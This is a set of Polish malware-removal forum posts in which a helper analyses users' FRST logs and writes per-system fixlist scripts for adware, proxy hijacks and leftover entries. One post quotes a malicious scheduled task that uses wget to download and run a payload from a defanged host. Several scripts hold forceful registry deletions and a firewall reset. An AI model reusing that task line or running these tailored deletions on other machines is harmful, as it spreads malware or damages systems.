picasso

Posty połączyłam, ale już teraz odpowiadaj w nowym poście. Stosowałeś już dużo skanerów: AdwCleaner, ComboFix oraz wątpliwy skaner z czarnej listy SpyHunter. Na dodatek Firefox był tu co dopiero resetowany oraz reinstalowany. Czy na pewno po tych akcjach problem nadal występuje? W raportach nie widać żadnych oczywistych oznak opisywanego zjawiska, pomimo że są pewne szczątki adware, choć zastanawia mnie ustawiona konfiguracja proxy unstopp.me. Czyli na teraz do wyczyszczenia proxy, wpisy odpadkowe i puste: 1. Odinstaluj stare wersje: Adobe AIR, Adobe Shockwave Player 12.1, Java 8 Update 31, Splashtop Connect for Firefox, Splashtop Connect IE, Windows Media Player Firefox Plugin. 2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files (x86)\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 3. Otwórz Notatnik i wklej w nim: CloseProcesses: S2 05837205; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserfasterSvc.dll",service S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2015-12-05] () S3 andnetndis; system32\DRIVERS\lgandnetndis64.sys [X] S2 AODDriver4.01; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] S3 ATICDSDr; \??\C:\Users\greeg\AppData\Local\Temp\ATICDSDr.sys [X] S3 dump_wmimmc; \??\E:\gry\NCSoft\Launcher\lineage2\system\GameGuard\dump_wmimmc.sys [X] S3 Frost_8_9_1_26; \??\E:\gry\LineageII PL\Frost\frost.sys [X] S3 Frost_9_12_1_3; \??\D:\gry\LineageII EU\Frost\frost.sys [X] S3 SANDRA; \??\C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2012.SP1\WNt500x64\Sandra.sys [X] Startup: C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\happy-new-year-pol-6080635.lnk [2015-04-01] Task: {1F7D4D60-AE4E-4345-A5F3-978A12A89B29} - System32\Tasks\{4C6D8442-2589-41EF-9B70-FA12BCBA98FD} => pcalua.exe -a G:\Freedom\Windows\98se-XP\setup.exe -d G:\Freedom\Windows\98se-XP Task: {2FEFCEF4-7AD6-46FE-AB84-4A424FB33FC9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000UA => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: {7B882036-178F-44F3-9559-CD475C424E9E} - System32\Tasks\{3731EC66-21EB-4B74-8399-30E486693067} => pcalua.exe -a "C:\Program Files (x86)\SimpleFiles\Uninstall.exe" Task: {9069A225-2E1E-4D10-AD0E-EAA6BE8A8277} - System32\Tasks\{FD044FBD-08A1-4ABF-B679-2861F21CE4FC} => pcalua.exe -a C:\Users\greeg\Desktop\ffdshow-tryouts-20061116-rev555\FFdshow-Tryouts-20061116-rev555.exe -d C:\Users\greeg\Desktop\ffdshow-tryouts-20061116-rev555 Task: {A641CB63-90FD-44CE-9C43-F858850E630C} - System32\Tasks\Sk-Enhancer-S-545697201 => c:\programdata\softsafe\sk-enhancer\Sk-Enhancer.exe Task: {FCE080F3-797E-4B00-A3B7-7DB03460B8A4} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000Core => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000Core.job => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000UA.job => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\Sk-Enhancer-S-545697201.job => c:\programdata\softsafe\sk-enhancer\Sk-Enhancer.exeG/schedule /profile c:\programdata\softsafe\sk-enhancer\545697201.ini HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver" ShellIconOverlayIdentifiers: [AcronisSyncError] -> {934BC6C0-FEC2-4df5-A100-961DE2C8A0ED} => Brak pliku ShellIconOverlayIdentifiers: [AcronisSyncInProgress] -> {00F848DC-B1D4-4892-9C25-CAADC86A215D} => Brak pliku ShellIconOverlayIdentifiers: [AcronisSyncOk] -> {71573297-552E-46fc-BE3D-3DFAF88D47B7} => Brak pliku CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKU\S-1-5-21-2241001177-833195801-3504404126-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://houmpage.com/?src=hp&ssid=1449238210&a=1008661&uuid=3348a2f7-719d-4d38-9f6f-75c2ee2cbb06 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://search.v9.com/web/?utm_source=b&utm_medium=update&from=update&uid=ST3250410AS_9RY1XND7XXXX9RY1XND7&ts=4587589 SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://search.v9.com/web/?utm_source=b&utm_medium=update&from=update&uid=ST3250410AS_9RY1XND7XXXX9RY1XND7&ts=4587589 SearchScopes: HKU\S-1-5-21-2241001177-833195801-3504404126-1000 -> {73B8C233-6941-4733-8451-9AE80A13752F} URL = hxxp://www.google.com/cse?cx=partner-pub-3794288947762788%3A7941509802&ie=UTF-8&q=&sa=Search&siteurl=www.google.com%2Fcse%2Fhome%3Fcx%3Dpartner-pub-3794288947762788%3A7941509802&q={searchTerms} SearchScopes: HKU\S-1-5-21-2241001177-833195801-3504404126-1000 -> {C896B776-4694-4b7a-ACCD-7132EC9720B9} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=IEBDSV SearchScopes: HKU\S-1-5-21-2241001177-833195801-3504404126-1000 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1449238210&a=1008661&uuid=3348a2f7-719d-4d38-9f6f-75c2ee2cbb06 FF Plugin-x32: @esn/esnlaunch,version=1.104.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.104.0\npesnlaunch.dll [brak pliku] FF Plugin-x32: @esn/esnlaunch,version=1.116.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.116.0\npesnlaunch.dll [brak pliku] FF Plugin-x32: @esn/esnlaunch,version=1.122.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.122.0\npesnlaunch.dll [brak pliku] FF Plugin-x32: @esn/esnlaunch,version=2.1.3 -> C:\Program Files (x86)\Battlelog Web Plugins\2.1.3\npesnlaunch.dll [brak pliku] FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [brak pliku] FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF Plugin HKU\S-1-5-21-2241001177-833195801-3504404126-1000: @tools.google.com/Google Update;version=3 -> C:\Users\greeg\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll [brak pliku] FF Plugin HKU\S-1-5-21-2241001177-833195801-3504404126-1000: @tools.google.com/Google Update;version=9 -> C:\Users\greeg\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll [brak pliku] C:\ProgramData\Temp C:\ProgramData\Microsoft\Windows\GameExplorer\{E8AE0286-9A63-4F4F-B479-0E4E4A2A8EB5} C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo III\Diablo III - Instrukcja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo III\Pomoc techniczna Blizzard.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo III\Zarządzanie kontem Battle.net.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Tanks C:\Users\greeg\AppData\Local\dt.dat C:\Users\greeg\AppData\Roaming\Enigma Software Group C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BeamNG-Techdemo-0.3 C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\I-Doser v4 C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ModPack by DjVirusPL LITE 0.8.9 v6 - No Hitboxes C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\XVM 5.0.1-test3 conf by DjVirusPL 0.8.9 v5 C:\Users\greeg\Desktop\Rangi TeamSpeak3\Rangi TeamSpeak3\ikony ts\icon\ikony\ikony — skrót.lnk C:\Users\greeg\Desktop\XBOX\JungleFlasher.exe — skrót.lnk C:\Windows\System32\DRIVERS\EsgScanner.sys Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\4game-service" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Google Update" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LightScribe Control Panel" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mobilegeni daemon" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MouseDriver" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\NextLive" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\se" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ZyngaGamesAgent" /f CMD: netsh advfirewall reset RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale już bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się dokładnie czy problemy nadal występują.

Tu jest dobre zestawienie: KLIK. Sterowniki te miała usunąć deinstalacja oprogramowania HP. Na wszelki wypadek zrób mi nowy log FRST po tych wszystkich deinstalacjach na następującym ustawieniu: w sekcji Filtrowanie odznaczone pozycje Usługi + Sterowniki, zaznaczone też pole Addition. Poproszę o wyciąg klucza pokazujący dokładny build. Otwórz Notatnik i wklej w nim: Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Wprawdzie poprzednie infekcje usunięte, ale pojawił się nowy problem odpowiadający podanym obrazkom. W katalogu Autostart powstało dużo podejrzanych obiektów, które wyglądają na pochodną tego już usuniętego skryptu CsBoostMs.vbs. A całość wygląda na jakiś niepożądany crack do gry. Ostatnio pobrane pliki to: 2015-11-30 15:51 - 2015-11-30 15:51 - 28121598 _____ C:\Users\Pawel\Desktop\csgomod-1511271841-de_alexandra.dem 2015-11-30 15:50 - 2015-11-30 15:50 - 04184700 _____ C:\Users\Pawel\Downloads\csgomod-1511271841-de_alexandra-1448646060-1448655240.zip Kolejne podejście: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bin [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Counter-Strike 1.6.exe.upk [2015-12-05] (CS-Boost.pl) Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Csboost.upk [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\motd_temp.html [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssvx.asi.upk [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssvx.dll.upk [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SAVE [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\slowhack.ini.upk [2015-12-05] () Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, by nie zablokował FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart i powstanie kolejny fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

W systemie jest infekcja w rodzaju VBKlip/Banatrix: Task: {7B119518-1A81-407A-9AA5-2026656037FF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=FLBXfL38mG;Minecraft_1.8.1_Setup.exe;1434626853 & start cmd /R dat.bmp Ale to nie wygląda na przyczynę problemów, bo opis (o ile nie ma przekłamań) wskazuje, że problem z ruzruchem występuje znacznie wcześniej w fazie sprzętowo-sterownikowej niż zaczyna działać podany wpis. W Dzienniku zdarzeń powtarzają się błędy związane z oprogramowaniem grafiki nVidia: Dziennik System: ============= Error: (12/06/2015 04:11:52 PM) (Source: Service Control Manager) (EventID: 7016) (User: ) Description: Usługa NVIDIA Display Driver Service zaraportowała nieprawidłowy stan bieżący 32. Nie wykluczam też ingerencji Kaspersky Internet Security (bardzo rozbudowany układ sterowników). Na razie usuń infekcję: 1. Deinstalacje: - Przez Panel sterowania odinstaluj zbędnik Browser Configuration Utility. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadek Dropbox Update Helper > Dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {087A29B3-E8A4-4EBE-920B-86951319A89D} - System32\Tasks\{47CD3A0E-294D-44A6-A0FE-276285D6B5E9} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {0F57977C-987B-4DED-B56B-BD5D35980545} - System32\Tasks\{05F506B7-F212-4107-827F-666EC3492888} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2\EAUninstall.exe" Task: {1706BF99-B122-424E-983A-42516E8E9F47} - System32\Tasks\{D7F62B37-8A1F-49FF-8C0C-516B3AE041FC} => E:\Gry\bin\settlershok.exe Task: {1E130E74-AB89-473E-A51B-0475A71B81D7} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2015-08-26] (Dropbox, Inc.) Task: {297ECF24-AE9F-4C4F-837F-D93D8247DC18} - System32\Tasks\{068C6815-68CF-42D3-9AA5-31E646CE26A2} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2 University\TSBin\TS2UPD.exe" -d "C:\Program Files\EA GAMES\The Sims 2 University\TSBin" Task: {3D9B50B3-5C9E-4557-80F4-DDBA014DAE87} - System32\Tasks\{17E5DB57-5BC8-4807-9B53-137529101CD3} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {4093740D-4DBF-439C-81FB-2D71B39AE580} - System32\Tasks\{3DDE85BA-5F25-426E-831E-E851F3445445} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {4DEB46B7-C65D-463D-8620-A7CC7CB06F56} - System32\Tasks\{0AB73D29-99AA-4DB7-B717-431A14F27308} => pcalua.exe -a "E:\Gry\The Sims 2\12_Updates\1_Original.exe" -d "E:\Gry\The Sims 2\12_Updates" Task: {7B119518-1A81-407A-9AA5-2026656037FF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=FLBXfL38mG;Minecraft_1.8.1_Setup.exe;1434626853 & start cmd /R dat.bmp Task: {800E7216-623D-4E65-B227-79C53729825B} - System32\Tasks\{9427E5F8-79EC-4457-A9B6-DA06BAFDAFAF} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {860F0765-A6A5-40DA-AC58-89A92CE6A4B0} - System32\Tasks\{E9508B9A-3CA0-4538-8EDD-848FCCC4F067} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {A0E0A8FA-2CC4-4A65-BCEF-D5BEC8690CFF} - System32\Tasks\{8943EBDB-1AF1-4212-B584-F3FB2927162A} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {A7E240D8-3525-4969-8F03-ABE86043A4CE} - System32\Tasks\{9363E1D2-2840-4E70-8EFE-F18DAA81E113} => E:\Gry\The Sims 2\13_Crack\TSBin\Sims2EP9.exe Task: {B5173413-CC7E-4A06-BCD1-41FE726C69E6} - System32\Tasks\{F5232608-CABF-4999-B9C2-08B7832D2FBE} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {BBB8B26A-5B68-4C66-A813-A4FA33C6F026} - System32\Tasks\{18CB654B-8D71-46C8-B865-DBD4E1CE8312} => C:\Program Files\Machinarium\machinarium.exe Task: {C73C8342-FB00-4E04-8311-25F81D8DAF01} - System32\Tasks\{4DBE77BC-8D8D-4B48-B955-588D29A336CF} => C:\Program Files\EA GAMES\The Sims 2 Rezydencje i ogrody Akcesoria\TSBin\Sims2Launcher.exe Task: {ECE14206-E29C-49E7-BE12-56B983828C0E} - System32\Tasks\{8BE9D02F-1EBB-45A4-919F-A7838D8C2BA5} => pcalua.exe -a "C:\Program Files\The Vanishing of Ethan Carter\Binaries\Launcher.exe" -d "C:\Program Files\The Vanishing of Ethan Carter\Binaries" Task: {F1C5DABB-41F4-47CA-9680-B5555961C80B} - System32\Tasks\{AC6BFA93-3B46-4B80-B02E-4B66AC5E441E} => pcalua.exe -a G:\Setup.exe -d G:\ Task: {F222E6AE-CD1D-48E2-AD4B-B92C62D71CEF} - System32\Tasks\{E6F600D8-5B0B-45C3-819D-33D545B5377F} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2EP9.exe Task: {F693F2FC-8AC6-4971-8BE0-23173167364D} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2015-08-26] (Dropbox, Inc.) Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe S2 dbupdate; C:\Program Files\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-26] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-26] (Dropbox, Inc.) R3 cpuz134; \??\C:\Users\Lisqui\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X] SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> {B9C3FD9C-B7E6-4fc2-9BCE-A1291F5C54C5} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=EGMB SearchScopes: HKU\S-1-5-21-3357052344-2897467679-35886000-1000 -> {DD18385B-81E9-4569-B0D8-661ECA1902D2} URL = hxxp://www.google.com/custom?client=pub-3794288947762788&forid=1&channel=5369970905&ie=UTF-8&oe=UTF-8&safe=active&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A1&hl=pl&q={searchTerms} FF user.js: detected! => C:\Users\Lisqui\AppData\Roaming\Mozilla\Firefox\Profiles\bwd06fxs.default-1445621495842\user.js [2015-10-23] CMD: type "C:\Program Files\Mozilla Firefox\defaults\pref\itms.js" C:\Program Files\Mozilla Firefox\defaults\pref\itms.js C:\Program Files\DAEMON Tools Pro C:\Program Files\Dropbox C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\Users\Lisqui\AppData\Local\Dropbox C:\Users\Lisqui\AppData\Roaming\DAEMON Tools Pro C:\Users\Lisqui\Downloads\DriverDetective.exe C:\Users\Lisqui\Downloads\ReimageRepair.exe C:\Windows\Reimage.ini Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BCU" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Pro Agent" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Dropbox" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Logitech Download Assistant" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy są jakieś widoczne zmiany.

tomcio123, nie jesteś na forum "świeżakiem", zasady działu nie zrealizowane: KLIK. Dodaj obowiązkowe raporty. A od ComboFix z daleka, obecnie większość spraw da się załatwić bez uruchamiania tego narzędzia.

Na temat pobierania z dobrychprogramów: KLIK. "Asystent pobierania" tego portalu wprowadził w system szkodliwe elementy. Problem z ładowaniem stron tworzy poniższe zadanie, które powinno także produkować reklamy "PriceFountain" na stronach typu Allegro: Task: {186D95C5-B64C-4D95-8CE0-16ADE63055B5} - System32\Tasks\ForedateMountebanksV2 => Rundll32.exe EmulsifiersBiggish.dll,main 7 1 Akcje do przeprowadzenia: 1. Odinstaluj stare wersje: Adobe AIR, Adobe Shockwave Player, Java SE Development Kit 7 Update 71 (64-bit), Opera 12.17. 2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {186D95C5-B64C-4D95-8CE0-16ADE63055B5} - System32\Tasks\ForedateMountebanksV2 => Rundll32.exe EmulsifiersBiggish.dll,main 7 1 S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X] HKLM-x32\...\Run: [] => [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Opera DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B53F81E7-905A-4952-A5F0-2B4E7C57A791} DisableService: PLAY ONLINE. RunOuc C:\Program Files (x86)\Mozilla Firefox\plugins C:\Users\Pawel\AppData\Local\ForedateMountebanks CMD: netsh advfirewall reset RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale bez Shortcut. Dołącz też plik fixlog.txt. Potwierdź ustąpienie problemu.

Jak konkretnie zachowuje się instalator CCleaner: brak reakcji, jakiś szczególny błąd? Brak widocznych oznak infekcji. Stan zabezpieczeń tragiczny. Rozpocznij od deinstalacji groźnej wersji J2SE Runtime Environment 5.0 oraz kompleksowej aktualizacji całego Windows. Linki do podstawowych instalatorów: KLIK. Platform: Microsoft Windows XP Professional Dodatek Service Pack 2 (X86) Język: Polski Internet Explorer Wersja 6 (Domyślna przeglądarka: FF)

W raportach brak jakichkolwiek oznak infekcji pasujących do opisywanego zdarzenia. Jest na dysku widoczny tylko jeden drobny szczątek adware (folder "Shortcut") i nic poza tym. Tylko kosmetyczne zadania do przeprowadzenia: 1. Odinstaluj starą wersję i zbędny program: Adobe Reader X (10.1.11) - Polish, HP Deskjet 2510 series — badanie mające na celu poprawę produktów. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\Documents and Settings\All Users\Dane aplikacji\F-Secure C:\Documents and Settings\Dom\Dane aplikacji\Shortcut C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\avast! Internet Security.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Centrum obsługi HP.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Corel CONNECT X6.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\HP Photosmart Essential 2.5.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Narzędzie Wireless N USB.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Nero StartSmart.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\PITy 2012.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Szkoła\2006-2007\Skrót do paliwo - maj 2008.lnk C:\Documents and Settings\Dom\Moje dokumenty\Zbyszek dokumenty\Zbyszek dokumenty\Szkoła\2006-2007\Skrót do paliwo - maj 2008.lnk C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\ars.cache C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\census.cache C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\housecall.guid.cache C:\Documents and Settings\Dom\Ustawienia lokalne\Dane aplikacji\F-Secure C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\system32\Drivers\tmcomm.sys 